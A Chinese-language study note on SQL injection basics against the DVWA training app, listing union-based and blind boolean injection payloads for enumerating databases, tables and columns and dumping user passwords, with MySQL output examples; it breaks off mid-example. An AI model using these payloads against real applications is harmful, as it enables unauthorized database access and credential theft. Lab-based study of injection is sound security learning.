sql注入基础-基于dvwa
SQL注入
问题
- 研究pdo的order by如何写
- 注入类型数字型、字符型如何判断
payload收集
参考:
https://blog.csdn.net/alex_seo/article/details/89240675
有回显
- 判断字段个数 oder by 1 ; union select 1,2
- 获取当前数据库 union select database()
- 获取当前数据库的表信息 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
- 获取表字段 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’
这里用到了’ 这些特殊字符,如果被过滤了可以考虑进行16进制转换
union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 - 下载数据 union select group_concat(user_id,first_name,last_name),group_concat(password) from users
无回显
-
判断数据库名称长度 and length(database())=4 判断长度是否为4
-
判断数据库名称 and ascii(substr(databse(),1,1))>97 判断数据库名的第一个字符的ascii是否>97
继续判断
1’ and ascii(substr(databse(),1,1))>100 # 报错
1’ and ascii(substr(databse(),1,1))<100 # 报错,则ascii为100,字母为d
最终能确认数据库名称为dvwa -
判断数据库表个数
and (select count (table_name) from information_schema.tables where table_schema=database())=1
判断表个数是否为1
具体sql的返回举例子
MySQL [dvwa]> select count(table_name) from information_schema.tables where table_schema="dvwa";
+-------------------+
| count(table_name) |
+-------------------+
| 2 |
+-------------------+
- 判断数据表名长度
length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1
逐次加大length长度,最后可以获得当前数据库中的表的个数
根据页面返回正常与否来判断表名的长度
例子:
MySQL [dvwa]> select length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1));
+--------------------------------------------------------------------------------------------------------------+
| length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)) |
+--------------------------------------------------------------------------------------------------------------+
| 9 |
+--------------------------------------------------------------------------------------------------------------+
- 猜解表明
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97
判断当前数据库的第一个表明的第一个字符是否>97, 这里可以逐步猜解出数据表名
例子
MySQL [dvwa]> select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1));
+---------------------------------------------------------------------------------------------------------------+
| ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) |
+---------------------------------------------------------------------------------------------------------------+
| 103 |
+---------------------------------------------------------------------------------------------------------------+
- 判断表中的字段个数
and (select count(column_name) from information_schema.columns where table_name= ’users’)=1
- 猜解字段长度
and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=1
判断users表的第一个字段长度是否为1,继续判断直到才接触长度
例子:
MySQL